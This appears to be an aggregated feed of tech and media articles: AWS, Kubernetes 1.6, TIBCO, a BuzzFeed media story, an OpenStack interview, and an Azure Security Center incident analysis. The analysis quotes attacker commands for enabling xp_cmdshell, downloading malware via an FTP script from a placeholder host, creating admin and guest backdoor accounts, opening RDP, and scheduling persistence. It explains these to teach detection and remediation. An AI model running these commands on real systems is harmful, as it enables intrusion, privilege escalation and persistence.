AWS Database Migration Service Adds Amazon Simple Storage Service (S3) as a Target

AWS Database Migration Service (DMS) has added Amazon Simple Storage Service (S3) as a migration target. Amazon S3 is object storage with a simple web interface to store and retrieve any amount of data. Together, the two products give you the ability to extract information from any database supported by DMS and write it to Amazon S3 in a format that can be used by almost any application.
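
For a concrete feel of the setup, the sketch below uses the AWS CLI to create an S3 target endpoint for DMS. The role ARN, bucket, and folder names are placeholders; by default DMS writes the migrated data to the bucket as CSV files.

aws dms create-endpoint \
    --endpoint-identifier s3-target-endpoint \
    --endpoint-type target \
    --engine-name s3 \
    --s3-settings ServiceAccessRoleArn=arn:aws:iam::123456789012:role/dms-s3-role,BucketName=my-migration-bucket,BucketFolder=migrated-data
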
Quelle: aws.amazon.com

TIBCO DataSynapse launches its Cloud Adapter for autoscaling in Azure

Since our launch of the TIBCO DataSynapse GridServer Engine image in the Azure Marketplace back in August, we have continued to pursue feature updates that improve the integration and experience of scheduling jobs and tasks into Azure. With the increased regulatory requirements of the Fundamental Review of the Trading Book (FRTB), the ability to burst into Azure for additional compute capacity is a hot topic within the Financial Services industry.

This week, TIBCO DataSynapse released the High Performance Computing Cloud Adapter (HPCCA) to extend the functionality of GridServer 6.2.0 and enable customers to temporarily increase their compute capacity in the cloud.

The hybrid burst scenario takes a step forward with the ability to dynamically create and provision both Linux and Windows VMs directly into Azure. Implemented as a Manager Hook in the Broker, HPCCA is able to review Broker events and take the right course of action through a simple cloud management algorithm.

Based on the number of events experienced, a formula predicts the number of VMs required, and VMs are started from a customer-created image. HPCCA can configure the current deployment and remote-start the Engine Daemons, ready to process these events.

HPCCA can also shut down the Engine Daemons as soon as events begin to decrease. Using the same set of Azure APIs, it triggers this action based on Engine idle time following event execution.

If you would like to hear more about this and you are based in the New York City area, please join us Wednesday, April 19th at the Microsoft office to view a demonstration.

Register now for the TIBCO and Microsoft Azure Workshop!

TIBCO DataSynapse GridServer is a service execution platform for dynamically scaling any application at any time across grid infrastructure. Because of the productivity, performance, and uptime gains it delivers, it is used heavily within Financial Services for the parallel computation of certain risk applications.
Quelle: Azure

Kubernetes 1.6: Multi-user, Multi-workloads at Scale

Today we’re announcing the release of Kubernetes 1.6. In this release the community’s focus is on scale and automation, to help you deploy multiple workloads to multiple users on a cluster. We are announcing that 5,000-node clusters are supported. We moved dynamic storage provisioning to stable. Role-based access control (RBAC), kubefed, kubeadm, and several scheduling features are moving to beta. We have also added intelligent defaults throughout to enable greater automation out of the box.

What’s New

Scale and Federation: Large enterprise users looking for proof of at-scale performance will be pleased to know that Kubernetes’ stringent scalability SLO now supports 5,000-node (150,000-pod) clusters. This 150% increase in total cluster size, powered by a new version of etcd v3 by CoreOS, is great news if you are deploying applications such as search or games which can grow to consume larger clusters.

For users who want to scale beyond 5,000 nodes or spread across multiple regions or clouds, federation lets you combine multiple Kubernetes clusters and address them through a single API endpoint. In this release, the kubefed command line utility graduated to beta, with improved support for on-premise clusters. kubefed now automatically configures kube-dns on joining clusters and can pass arguments to federated components.

Security and Setup: Users concerned with security will find that RBAC, now beta, adds a significant security benefit through more tightly scoped default roles for system components. The default RBAC policies in 1.6 grant scoped permissions to control-plane components, nodes, and controllers. RBAC allows cluster administrators to selectively grant particular users or service accounts fine-grained access to specific resources on a per-namespace basis. RBAC users upgrading from 1.5 to 1.6 should view the guidance here.

Users looking for an easy way to provision a secure cluster on physical or cloud servers can use kubeadm, which is now beta. kubeadm has been enhanced with a set of command line flags and a base feature set that includes RBAC setup, use of the Bootstrap Token system, and an enhanced Certificates API.

Advanced Scheduling: This release adds a set of powerful and versatile scheduling constructs to give you greater control over how pods are scheduled, including rules to restrict pods to particular nodes in heterogeneous clusters, and rules to spread or pack pods across failure domains such as nodes, racks, and zones.

Node affinity/anti-affinity, now in beta, allows you to restrict pods to schedule only on certain nodes based on node labels. Use built-in or custom node labels to select specific zones, hostnames, hardware architecture, operating system versions, specialized hardware, etc. The scheduling rules can be required or preferred, depending on how strictly you want the scheduler to enforce them.

A related feature, called taints and tolerations, makes it possible to compactly represent rules for excluding pods from particular nodes. The feature, also now in beta, makes it easy, for example, to dedicate sets of nodes to particular sets of users, or to keep nodes that have special hardware available for pods that need that hardware by excluding pods that don’t need it.
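
As a flavor of how these constructs are expressed, below is a minimal sketch of a pod spec using required node affinity to pin a pod to a single zone; the zone value and container image are placeholder choices, not taken from the announcement:

apiVersion: v1
kind: Pod
metadata:
  name: with-node-affinity
spec:
  affinity:
    nodeAffinity:
      # "required" rules are hard constraints; "preferred" rules are soft
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: failure-domain.beta.kubernetes.io/zone
            operator: In
            values:
            - us-central1-a
  containers:
  - name: app
    image: nginx
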
Sometimes you want to co-schedule services, or pods within a service, near each other topologically, for example to optimize North-South or East-West communication. Or you want to spread pods of a service for failure tolerance, or keep antagonistic pods separated, or ensure sole tenancy of nodes. Pod affinity and anti-affinity, now in beta, enables such use cases by letting you set hard or soft requirements for spreading and packing pods relative to one another within arbitrary topologies (node, zone, etc.).

Lastly, for the ultimate in scheduling flexibility, you can run your own custom scheduler(s) alongside, or instead of, the default Kubernetes scheduler. Each scheduler is responsible for different sets of pods. Multiple schedulers is beta in this release.

Dynamic Storage Provisioning: Users deploying stateful applications will benefit from the extensive storage automation capabilities in this release of Kubernetes.

Since its early days, Kubernetes has been able to automatically attach and detach storage, format disks, mount and unmount volumes per the pod spec, and do so seamlessly as pods move between nodes. In addition, the PersistentVolumeClaim (PVC) and PersistentVolume (PV) objects decouple the request for storage from the specific storage implementation, making the pod spec portable across a range of cloud and on-premise environments. In this release, StorageClass and dynamic volume provisioning are promoted to stable, completing the automation story by creating and deleting storage on demand, eliminating the need to pre-provision.

The design allows cluster administrators to define and expose multiple flavors of storage within a cluster, each with a custom set of parameters. End users can stop worrying about the complexity and nuances of how storage is provisioned, while still selecting from multiple storage options.

In 1.6, Kubernetes comes with a set of built-in defaults to completely automate the storage provisioning lifecycle, freeing you to work on your applications. Specifically, Kubernetes now pre-installs system-defined StorageClass objects for AWS, Azure, GCP, OpenStack and VMware vSphere by default. This gives Kubernetes users on these providers the benefits of dynamic storage provisioning without having to manually set up StorageClass objects. This is a change in the default behavior of PVC objects on these clouds. Note that the default behavior is that dynamically provisioned volumes are created with the “delete” reclaim policy. That means once the PVC is deleted, the dynamically provisioned volume is automatically deleted, so users do not have the extra step of ‘cleaning up’.

In addition, we have expanded the range of storage supported overall, including:

- ScaleIO Kubernetes Volume Plugin, enabling pods to seamlessly access and use data stored on ScaleIO volumes
- Portworx Kubernetes Volume Plugin, adding the capability to use Portworx as a storage provider for Kubernetes clusters. Portworx pools your server capacity and turns your servers or cloud instances into converged, highly available compute and storage nodes
- Support for NFSv3, NFSv4, and GlusterFS on clusters using the COS node image
- Support for user-written/run dynamic PV provisioners. A golang library and examples can be found here
- Beta support for mount options in persistent volumes
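
To illustrate what this means for end users, below is a minimal sketch of a PersistentVolumeClaim; on a 1.6 cluster with a pre-installed default StorageClass (e.g., on AWS or GCP), submitting it is enough to have a volume created on demand. The claim name and size are arbitrary examples:

apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: data-claim
spec:
  # No StorageClass is named, so the cluster's default StorageClass
  # is used and the volume is provisioned dynamically.
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 8Gi
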
Container Runtime Interface, etcd v3 and Daemon set updates: While users may not directly interact with the container runtime or the API server datastore, they are foundational components for user-facing functionality in Kubernetes. As such, the community invests in expanding the capabilities of these and other system components.

The Docker-CRI implementation is beta and is enabled by default in kubelet. Alpha support for other runtimes, cri-o, frakti and rkt, has also been implemented. The default backend storage for the API server has been upgraded to use etcd v3 by default for new clusters. If you are upgrading from a 1.5 cluster, care should be taken to ensure continuity by planning a data migration window. Node reliability is improved as Kubelet exposes an admin-configurable Node Allocatable feature to reserve compute resources for system daemons. Daemon set updates let you perform rolling updates on a daemon set.

Alpha features: This release was mostly focused on maturing functionality; however, a few alpha features were added to support the roadmap:

- Out-of-tree cloud provider support adds a new cloud-controller-manager binary that may be used for testing the new out-of-core cloud provider flow
- Per-pod eviction in case of node problems, combined with tolerationSeconds, lets users tune the duration a pod stays bound to a node that is experiencing problems
- Pod Injection Policy adds a new API resource, PodPreset, to inject information such as secrets, volumes, volume mounts, and environment variables into pods at creation time
- Custom metrics support in the Horizontal Pod Autoscaler changed to use
- Multiple Nvidia GPU support is introduced, with the Docker runtime only

These are just some of the highlights in our first release for the year. For a complete list please visit the release notes.

Community

This release is possible thanks to our vast and open community. Together, we’ve pushed nearly 5,000 commits by some 275 authors. To bring our many advocates together, the community has launched a new program called K8sPort, an online hub where the community can participate in gamified challenges and get credit for their contributions. Read more about the program here.

Release Process

A big thanks goes out to the release team for 1.6 (led by Dan Gillespie of CoreOS) for their work bringing the 1.6 release to light. This release team is an exemplar of the Kubernetes community’s commitment to community governance. Dan is the first non-Google release manager, and he, along with the rest of the team, worked throughout the release (building on the great work of the 1.5 release manager, Saad Ali) to uncover and document tribal knowledge, shine light on tools and processes that still require special permissions, and prioritize work to improve the Kubernetes release process. Many thanks to the team.

User Adoption

We’re continuing to see rapid adoption of Kubernetes in all sectors and sizes of businesses. Furthermore, adoption is coming from across the globe, from a startup in Tennessee, USA to a Fortune 500 company in China. JD.com, one of China’s largest internet companies, uses Kubernetes in conjunction with their OpenStack deployment. They’ve moved 20% of their applications thus far onto Kubernetes and are already running 20,000 pods daily. Read more about their setup here. Spire, a startup based in Tennessee, witnessed their public cloud provider experience an outage, but suffered zero downtime because Kubernetes was able to move their workloads to different zones. Read their full experience here.

“With Kubernetes, there was never a moment of panic, just a sense of awe watching the automatic mitigation as it happened.”

Share your Kubernetes use case story with the community here.

Availability

Kubernetes 1.6 is available for download here on GitHub and via get.k8s.io. To get started with Kubernetes, try one of these interactive tutorials.

Get Involved

CloudNativeCon + KubeCon in Berlin is this week, March 29-30, 2017.
We hope to get together with much of the community and share more there!

- Share your voice at our weekly community meeting
- Post questions (or answer questions) on Stack Overflow
- Follow us on Twitter @Kubernetesio for latest updates
- Connect with the community on Slack

Many thanks for your contributions and advocacy!

– Aparna Sinha, Senior Product Manager, Kubernetes, Google
Quelle: kubernetes

Pro-Trump Media Has A New Obsession: The White House Briefing Room


Following Trump administration Press Secretary Sean Spicer’s pledge to establish a White House press corps with voices “outside of Washington”, a number of unabashedly Trump-friendly news outlets have made the pilgrimage to the West Wing briefing room — the symbolic heart of the establishment. Their goal: to bring their anti-elite, pro-Trump, and occasionally trollish brand of coverage to the White House.

For some of these self-described “real news” outlets and personalities, landing a seat in the White House briefing room is vindication of their often sensational and semi-factual 2016 presidential campaign stories, which some believe undermined the candidacy of Hillary Clinton and helped propel Trump to the Oval Office. For others, it’s a chance to ask questions the mainstream media won’t touch. And for many, there’s a singular benefit worth the trip to Washington alone: the exposure that comes from seeing and being seen on the highest-rated show on daytime TV.

“The briefing room has become a piece of pop culture for this generation and the people who followed the election every day on TV and are now glued to the day-to-day,” one newer White House correspondent told BuzzFeed News. For the reporter, being in the room brings with it the intoxicating proposition of asking a question that could set the news cycle for the day — or the week. “And so it’s definitely an opportunity for far-right, crazy blogosphere types to make a name for themselves. It’s that way for anyone new but definitely true for the far-right guys. Everyone’s watching.”

“It’s definitely an opportunity for far-right, crazy blogosphere types to make a name for themselves.”

For Jim Hoft and Lucian Wintrich of the far-right blog Gateway Pundit, a short time in the briefing room has generated enormous returns. Hoft, Gateway Pundit’s founder, announced Wintrich’s White House correspondent position at ‘The Deploraball’ the night before Trump was sworn in as president. Since then, the 28-year-old Wintrich has been the focus of dozens of articles (one by this writer), the star of a documentary film, and, last week, the subject of a lengthy New Yorker profile. Earlier this month, he was the alleged victim of an altercation inside the briefing room involving Fox Radio’s John Decker, who, according to Wintrich and a few observers, openly chastised Gateway Pundit as a racist, xenophobic outlet. The incident — the details of which are disputed by both parties — was partially witnessed and tweeted by well-followed members of the White House press corps, written up in a variety of publications, and outrage-shared across the pro-Trump internet, casting Wintrich among the far-right as the heroically aggrieved party, just trying to do his job.

But Wintrich has yet to ask a question of Spicer. Instead, he’s opted to “feel out the room” and “learn the protocols” before jumping in. “If you see pictures of me on Twitter in the briefing room, I’m literally squeezed in the corner taking notes,” he told BuzzFeed News.

The daily briefing spectacle has caught the eye of non-Washington types like New Right blogger and Twitter personality Mike Cernovich, who lives in California. “It’s so good for your brand to be in the room now because it still seems like this prestigious place,” he told BuzzFeed News. “That’s why the press corps is losing it — White House access is a major status thing and now it feels like everyone’s able to do it.”

While Spicer’s briefings may appear more open to the media’s fringes, the truth is, the briefing has never been overly exclusive. Day passes for a trip to the press room require little more effort than submitting some personal information to the White House (caveat: full-time “hard passes” are much harder to obtain). Cernovich said he has tentative plans to try and drop by a briefing sometime in April. Last week on Twitter he asked his followers, “should I get a White House pass?” (again, it doesn’t quite work that way, but the sentiment suggests he wants to show up). Responses ranged from “Light eradicates darkness. DO IT!” to “I think we should revoke CNN’s and give it to you.”

The conspiracy and pro-Trump news site Infowars has deftly injected itself into the Beltway news cycle multiple times without even stepping into the briefing room. In February, Infowars’ founder Alex Jones posted a video falsely claiming he’d secured White House press credentials from the Trump administration. Jones subsequently walked back that claim, explaining he’d simply taken initial steps to secure credentials. In late January, Jones hired former World Net Daily writer and fellow conspiracy theorist Jerome Corsi to head up an Infowars Washington bureau. In early February, Corsi tweeted that the White House had told him it “didn’t think there would be any problem in Infowars and Alex Jones and me getting press credentials.”

Two weeks ago, Lauren Southern, a controversial far-right Canadian media personality, made her way to DC to attend a White House briefing, where she tweeted a selfie with the caption, “Independent media takeover.” The tweet ricocheted around the internet; for pro-Trumpers it was another win for the unsung voices of “new media.” Southern — known for her previous denunciations of both rape culture and popular feminism — showing up in the briefing room registered to some as an alarming breach. A few hours after posting the selfie, Media Matters ran a story with the headline, “Meet Lauren Southern, The Latest “Alt-Right” Media Troll To Gain Access To The White House Press Briefing.” The story called Southern “just the latest of the fringe, sycophantic “alt-right” media personalities that the White House is letting into its press briefings.”

Southern said she decided to show up in the room after Wintrich’s confrontation. “I heard there was hostility towards new media in the briefing room and wanted to see the experience for myself,” she told BuzzFeed News, adding that she intends to return “in order to ask questions the MSM won’t touch.”

The new prestige of the White House briefing room reverses decades of decline. For years, the role of White House correspondent had gradually shifted from being central in journalism to one that many reporters dreaded as being captive to unresponsive, low-level aides while big stories broke across the internet and elsewhere. Even so, tensions over briefing room access have flared in the early weeks of Trump’s presidency. A number of reporters for mainstream outlets have voiced public concerns on Twitter over Spicer and President Trump’s penchant for calling on conservative media outlets during press conferences.

This month, after a reporter for the Heritage Foundation’s Daily Signal served as the press pool reporter for a Vice Presidential event, the Washington Post’s Paul Farhi questioned partisanship’s role in the White House press corps in an article headlined, “What’s a legitimate news outlet? A new face in the White House press pool raises questions.” And in a recent New Yorker article, White House correspondents and camera crew from legacy news outlets were quoted sniping at the new publications that have popped up in the briefing room. In one instance a radio correspondent was overheard bemoaning that, “at best, they don’t know what they’re doing…at worst, you wonder whether someone is actually feeding them softball questions.”

The prickly reception given to White House briefing room newcomers isn’t exactly unprecedented. At his first press conference in 2009, President Obama’s decision to call on The Huffington Post’s Sam Stein prompted a mini news cycle of its own. Time Magazine described Obama’s decision as such: “the whole White House media shop, has crossed a Rubicon of sorts, acknowledging the equivalent legitimacy of an unapologetically unobjective media outlet, which lives nowhere but the Internet and which didn’t even exist four years ago.”

At the time, New York Times White House reporter Peter Baker called the decision to add partisan-leaning blogs to the press corps “troubling,” arguing that “We’re blurring the line between news and punditry even further and opening ourselves to legitimate questions among readers about where the White House press corps gets its information.” It’s a position Baker still appears to hold today; this month he told The Daily Signal that the issue has only grown murkier. “It becomes harder to draw lines now and say this organization is acceptable and this one is not,” he wrote.

Multiple self-professed members of pro-Trump outlets told BuzzFeed News their welcome to the room by more established outlets was less than friendly — “there’s a palpable tension there,” Wintrich told BuzzFeed News — while two other White House correspondents said allegations of a freeze-out were “overblown.” The discrepancy likely results from the spectrum of conservative outlets and reporters in the Trump press room. While some, like Wintrich and Gateway Pundit, delight in trolling, plenty of reporters from right-leaning new media outlets try to play it straight and push the administration on claims like wiretapping and Russian interference in the election. “Plenty of those guys come from conservative outlets but still show up every day ready to do the hard work like everyone else,” one White House correspondent said.

“They’re playing right into our fucking hands — it’s ridiculous.”

Regardless, the perceived tension and occasional hand-wringing from mainstream media is having the — perhaps unintended — consequence of elevating the profiles of the new faces in the room. The trolls, in essence, have been fed.

“They’re playing right into our fucking hands — it’s ridiculous,” Wintrich said, describing the reaction to the briefing room altercation a few weeks ago. “So many members of conservative media after this happened reached out all supportive and told me how unfair the situation was. That’s street cred for me.” For Southern, the reaction from places like Media Matters is what will keep her coming back to the press room. “I literally just stood there and this was their reaction? I look forward to seeing the collective meltdown when I actually get a question in,” she said.

“I think members of the media are doing a disservice to themselves by putting so much attention on people who don’t report each day from the White House and use the briefing to bring attention to themselves,” one White House reporter said. “The Gateway Pundit situation was an ordeal and all but at the end of the day I don’t know I’ve ever read anything by [Wintrich]. So why not just ignore it?” In Southern’s case, Cernovich agrees. “They’re so triggered by the presence of people like Wintrich that they made him into an overnight sensation. He got the mainstream media to troll themselves.”

Quelle: BuzzFeed

AWS CloudFormation Supports Authoring Templates with Code References and Amazon VPC Peering

You can now simplify your AWS CloudFormation template authoring by inserting references to existing CloudFormation templates using the Include transform. Transforms are declarative statements within CloudFormation templates that instruct CloudFormation how to process your template. The Include transform instructs CloudFormation where in the main template to inject CloudFormation template snippets stored in S3 buckets. For example, you can maintain your commonly used resource definitions as template snippets and use the Include transform to retrieve and include them in your main template to create or update stacks. Visit here to learn more.
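
As a rough illustration of the syntax (the bucket, key, and resource names here are invented for the example), a main template can splice in a snippet stored in S3 like this:

Resources:
  'Fn::Transform':
    Name: 'AWS::Include'
    Parameters:
      Location: 's3://my-template-bucket/snippets/common-resources.yaml'
  AppBucket:
    Type: AWS::S3::Bucket

When the stack is created or updated, CloudFormation fetches the snippet from the S3 location and processes the template as if its contents had been authored inline.
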
Quelle: aws.amazon.com

How Azure Security Center helps reveal a Cyberattack

The Azure Security Center (ASC) analyst team reviews and investigates ASC alerts to gain insight into security incidents affecting Microsoft Azure customers, helping improve Azure Security alerts and detections. ASC helps customers keep pace with rapidly evolving threats by using advanced analytics and global threat intelligence.

Although we have come a long way as far as cloud security is concerned, security is still heavily discussed as companies consider moving their assets to the cloud. The Azure Security Center team understands how critical it is for our customers to be assured that their Azure deployments are secure, not only from advanced attacks but also from ones that are not necessarily new or novel. The beauty of ASC lies in its simplicity. Although ASC uses machine learning, anomaly detection, and behavioral analysis to identify suspicious events, it still addresses simple things like the SQL brute force attacks that bad guys and script kiddies use to break into Microsoft SQL servers.

In this blog, we’ll map out the stages of one real-world attack campaign that began with a SQL Brute Force attack, which was detected by the Security Center, and the steps taken to investigate and remediate the attack. This case study provides insights into the dynamics of the attack and recommendations on how to prevent similar attacks in your environment.

Initial ASC alert and details

Hackers are always trying to target internet-connected databases. There are tons of bad guys trying to discover IP addresses that have SQL Server running so that they can crack passwords through brute force attacks. A SQL database can contain a wealth of valuable information for attackers, including personally identifiable information, credit card numbers, intellectual property, etc. Even if the database doesn’t hold much information, a successful attack on an insecurely configured SQL installation can be leveraged to gain full system admin privileges.

Our case started with an ASC Alert notification to the customer detailing malicious SQL activity. A command line "ftp -s:C:\zyserver.txt" launched by the SQL service account was unusual and was flagged by ASC Alerts.

The alert provided details such as date and time of the detected activity, affected resources, subscription information, and included a link to a detailed report of the detected threat and recommended actions.

Through our monitoring, the ASC analyst team was also alerted to this activity and looked further into the details of the alert. What we discovered was that the SQL service account (SQLSERVERAGENT) was creating FTP scripts (i.e., C:\zyserver.txt), which were used to download and launch malicious binaries from an FTP site.

The initial compromise

A deeper investigation into the affected Azure subscription began with inspection of the SQL error and trace logs, where we found indications of SQL brute force attempts. In the SQL error logs, we encountered hundreds of “Audit Login Failed” logon attempts for the SQL admin ‘sa’ account (the built-in SQL Server administrator account), which eventually led to a successful login.

These brute force attempts occurred over TCP port 1433, which was exposed on a public facing interface. TCP port 1433 is the default port for SQL Server.

Note: Changing the SQL default port 1433 is a very common recommendation, but it may impart a false sense of security, because many port scanning tools can scan a range of network ports and eventually find SQL listening on a port other than 1433.

Once the SQL Admin ‘sa’ account was compromised by brute force, the account was then used to enable the ‘xp_cmdshell’ extended stored procedure as we’ve highlighted below in a SQL log excerpt.

The ‘xp_cmdshell’ stored procedure is disabled by default and is of particular interest to attackers because of its ability to invoke a Windows command shell from within Microsoft SQL Server. With ‘xp_cmdshell’ enabled, the attacker created SQL Agent jobs which invoked ‘xp_cmdshell’ and launched arbitrary commands, including the creation and launch of FTP scripts which, in turn, downloaded and ran malware.
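
In generic form, enabling ‘xp_cmdshell’ looks like the following T-SQL; this is the standard sequence, not the attacker’s exact statements:

-- 'show advanced options' must be on before xp_cmdshell can be toggled
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;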

Details of malicious activity

Once we determined how the initial compromise occurred, our team began analyzing Process Creation events to determine other malicious activity. The Process Creation events revealed the execution of a variety of commands, including downloading and installing backdoors and arbitrary code, as well as permission changes made on the system.

Below we have detailed a chronological layout of process command lines that we determined to be malicious:

A day after the initial compromise, we began to see the modification of ACLs on files/folders and registry keys with the use of Cacls.exe (which appears to have been renamed to osk.exe and vds.exe).

Note: Osk.exe is the executable for the Accessibility On-Screen Keyboard and Vds.exe is the Virtual Disk Service executable, both typically found on a Windows installation. The command lines and command switches detailed below, however, are not used for Osk.exe or VDS.exe and are associated with Cacls.exe.

The Cacls.exe command switches /e /g are used to grant the System account full (:f) access rights to ‘cmd.exe’ and ‘net.exe’.
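
Reconstructed for illustration (the paths are assumed; the binaries are the renamed copies of Cacls.exe noted above), the command lines would have taken roughly this form:

rem grant the SYSTEM account full control of cmd.exe and net.exe via the renamed cacls
osk.exe c:\windows\system32\cmd.exe /e /g system:f
vds.exe c:\windows\system32\net.exe /e /g system:f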

A few seconds later, we see the termination of known Antivirus Software using the Windows native “taskkill.exe”.

This was followed by the creation of an FTP script (c:\zyserver.txt), which was flagged in the original ASC Alert. This FTP script appears to download malware (c:\stserver.exe) from a malicious FTP site and subsequently launch the malware.
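
An FTP script of this kind typically looks like the following hypothetical reconstruction; the server address and credentials here are placeholders, not recovered values:

open ftp.malicious-host.example
baduser
badpassword
binary
get stserver.exe c:\stserver.exe
bye

Running "ftp -s:c:\zyserver.txt" then executes these commands non-interactively, after which a separate command launches the downloaded binary.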

A few minutes later, we see the “net user” and “net localgroup” commands used to accomplish the following (illustrative command lines appear after the list):

a.    Activate the built-in guest account and add it to the Administrators group

b.   Create a new user account and add the newly created user to the Administrators group
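
In generic form (the account name and password here are placeholders, not the attacker’s actual values), those two steps look like:

rem (a) activate the built-in guest account and elevate it
net user guest /active:yes
net localgroup administrators guest /add

rem (b) create a new account and elevate it
net user backdooruser P@ssw0rd123 /add
net localgroup administrators backdooruser /add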

A little over two hours later, we see the regini.exe command, which appears to be used to create, modify, or delete registry keys. Regini can also set permissions on registry keys as defined in the noted .ini file. We then see regsvr32.exe silently (/s switch) registering DLLs related to the Windows shell (urlmon.dll, shdocvw.dll) and Windows scripting (jscript.dll, vbscript.dll, wshom.ocx).

This is immediately followed by additional modification of permissions on various Windows executables, essentially resetting each to default with the “icacls.exe” command.

Note: The /reset switch replaces ACLs with default inherited ACLs for all matching files.
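
For reference, a reset of this kind looks like the following; the file selection is an assumption for illustration:

rem replace ACLs on matching executables with default inherited ACLs
icacls c:\windows\system32\*.exe /reset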

Lastly, we observed the modification of the “Terminal Server” fDenyTSConnections registry value, which holds the configuration of Terminal Server connection restrictions. This led us to believe that malicious RDP connections might be the attacker’s next step to access the server. Inspection of logon events, however, did not reveal any malicious RDP attempts or connections:

Disabling of Terminal Server connection restrictions by overwriting values in the “Terminal Server” registry key
reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

We also noticed a scheduled task being created. This task referenced a binary named “svchost.exe” to be launched out of the C:\RECYCLER folder, which is suspicious.

Note that the legitimate “svchost.exe” files are located in “Windows\System32” and “Windows\SysWOW64”. Svchost.exe running from any other directory should be considered suspicious.

Persistence mechanism – Task Scheduler utility (schtasks.exe) used to set a recurring task
C:\Windows\System32\schtasks.exe /create /tn "45645" /tr "C:\RECYCLER\svchost.exe" /sc minute /mo 1 /ru "system"

Recommended remediation and mitigation steps

Once we understood the extent and the details of the attack, we recommended the following remediation and mitigation steps to be taken.

First, if possible, we recommended backing up and rebuilding the SQL Server and resetting all user accounts. We then recommended implementing the following mitigation steps to help prevent further attacks.

1. Disable the ‘sa’ account and use the more secure Windows Authentication

To disable the ‘sa’ login via SQL, run the following commands as a sysadmin:

ALTER LOGIN sa DISABLE

GO

2. To help prevent attackers from guessing the ‘sa’ account, rename the ‘sa’ account
To rename the ‘sa’ account via SQL, run the following as a sys admin:

ALTER LOGIN sa WITH NAME = [new_name];

GO

3. To prevent future brute force attempts, change and harden the ‘sa’ password and set the sa Login to ‘Disabled’.
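
For example, via T-SQL (the placeholder must be replaced with a long, random password):

ALTER LOGIN sa WITH PASSWORD = '<long-random-password>';

GO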

Learn how to verify and change the system administrator password in MSDE or SQL Server 2005 Express Edition.

4. It’s also a good idea to ensure that ‘xp_cmdshell’ is disabled. Again, note that this should be disabled by default.
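
To verify and turn it off via T-SQL, the standard sequence is:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;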

5. Block TCP port 1433 if it does not need to be open to the internet. From your Azure portal, take the following steps to configure a rule to block 1433 in a Network Security Group:

a. Open the Azure portal

b. Navigate to > (More Services) -> Network security groups

c. If you have opted into the Network Security option, you will see an entry for <ComputerName-nsg> — click it to view your Security Rules

d. Under Settings click "Inbound security rules" and then click +Add on the next pane

e. Enter the Rule name and Port information. Under the ‘Service’ pulldown, choose MS SQL and it will automatically select Port range = 1433 as detailed below.

f. Then apply the newly created rule to the subscription
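
If you prefer scripting the same rule, an equivalent Azure CLI 2.0 command is sketched below; the resource group, NSG name, and priority are placeholders:

az network nsg rule create --resource-group MyResourceGroup --nsg-name MyServer-nsg --name DenySqlInbound --priority 100 --direction Inbound --access Deny --protocol Tcp --destination-port-range 1433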

6. Inspect all stored procedures that may have been enabled in SQL and look for stored procedures that may be invoking ‘xp_cmdshell’ and running unusual commands.

For example, in our case, we identified the following commands:

7. Lastly, we highly recommend configuring your Azure subscription(s) to receive future alerts and email notifications from Microsoft Azure Security Center. To receive alerts and email notifications of security issues like this one, upgrade from the ASC “Free” (basic detection) tier to the ASC “Standard” (advanced detection) tier.

Below is an example of the email alert received from ASC when this SQL incident was detected:

Learn more about SQL detection

Azure SQL Database Threat Detection–Advanced DB Security in the Cloud
Protect Azure SQL Databases with Azure Security Center
SQL Threat Detection – Your built-in security expert

Quelle: Azure

Stephen Finucane – OpenStack Nova – What’s new in Ocata

At the OpenStack PTG in February, Stephen Finucane speaks about what’s new in Nova in the Ocata release of OpenStack.

Stephen: I’m Stephen Finucane, and I work on Nova for Red Hat.

I’ve previously worked at Intel. During most of my time working on Nova I’ve been focused on the same kind of feature set, which is what Intel liked to call EPA – Enhanced Platform Awareness – or NFV applications. Making Nova smarter from the perspective of Telco applications. You have all this amazing hardware, how do you expose that up and take full advantage of that when you’re running virtualized applications?

The Ocata cycle was a bit of an odd one for me, and probably for the project itself, because it was really short. The normal cycle runs for about six months. This one ran for about four.

During the Ocata cycle I actually got core status. That was probably as a result of doing a lot of reviews. Lot of reviews, pretty much every waking hour, I had to do reviews. And that was made possible by the fact that I didn’t actually get any specs in for that cycle.

So my work on Nova during that cycle was mostly around reviewing Python 3 fixes. It’s still very much a community goal to get support in Python 3. 3.5 in this case. Also a lot of work around improving how we do configuration – making it so that administrators can actually understand what different knobs and dials Nova exposes, what they actually mean, and what the implications of changing or enabling them actually are.

Both of these have been going in since before the Ocata cycle, and we made really good progress during the Ocata cycle to continue to get ourselves 70 or 80% of the way there, and in the case of config options, the work is essentially done there at this point.

Outside of that, the community as a whole, most of what went on this cycle was again a continuation of work that has been going on the last couple cycles. A lot of focus on the maturity of Nova. Not so much new features, but improving how we did existing features. A lot of work on resource providers, which are a way that we can keep track of the various resources that Nova’s aware of, be they storage, or cpu, or things like that.

Coming forward, as far as Pike goes, it’s still very much up in the air. That’s what we’re here for this week discussing. There would be, from my perspective, a lot of the features that I want to see, doubling down on the NFV functionality that Nova supports. Making things like SR-IOV easier to use, and more performant, where possible. There’s also going to be some work around resource providers again for SR-IOV and NFV features and resources that we have.

The other stuff that the community is looking at, pretty much up in the air. The idea of exposing capabilities, something that we’ve had a lot of discussion about already this week, and I expect we’ll have a lot more. And then, again, evolution of the Nova code base – what more features the community wants, and various customers want – going and providing those.

This promises to be a very exciting cycle, on account of the fact that we’re back into the full six month mode. There’s a couple of new cores on board, and Nova itself is full steam ahead.
Quelle: RDO